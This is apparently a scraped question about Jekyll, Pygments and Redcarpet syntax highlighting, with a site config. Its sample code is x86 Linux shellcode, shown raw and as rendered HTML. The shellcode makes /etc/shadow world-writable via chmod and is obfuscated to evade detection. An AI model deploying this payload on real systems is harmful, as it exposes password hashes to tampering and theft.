
时间:2015-07-30 06:37:20

标签: jekyll pygments redcarpet


  section .text
       global _start
       xor ecx, ecx
       mov al,15   ; changed push pop to mov
       push ecx
       push byte 0x77
       mov cx,0x4d42 ; random addition before pushing
       add cx,0x2222
       push cx
       push 0x6168732f
       push 0x6374652f
       mov ebx, esp
       push word 0x1b6
       pop ecx
       int 0x80</p>
           mov al,1  ; changed push pop to mov
       int 0x80


<div class="highlight"><pre><code class="language-nasm" data-lang="nasm">  section .text
       global _start
       xor ecx, ecx
       mov al,15   ; changed push pop to mov
       push ecx
       push byte 0x77
       mov cx,0x4d42 ; random addition before pushing
       add cx,0x2222
       push cx
       push 0x6168732f
       push 0x6374652f
       mov ebx, esp
       push word 0x1b6
       pop ecx
       int 0x80&lt;/p&gt;
       mov al,1  ; changed push pop to mov
       int 0x80


name: "Cloud101"
description: "Blog"
gems: [jekyll-paginate]
url: ""

paginate: 10
markdown: redcarpet

syntax_highlighter: pygments
  extensions: ["no_intra_emphasis", "fenced_code_blocks", "autolink", "strikethrough", "superscript"]

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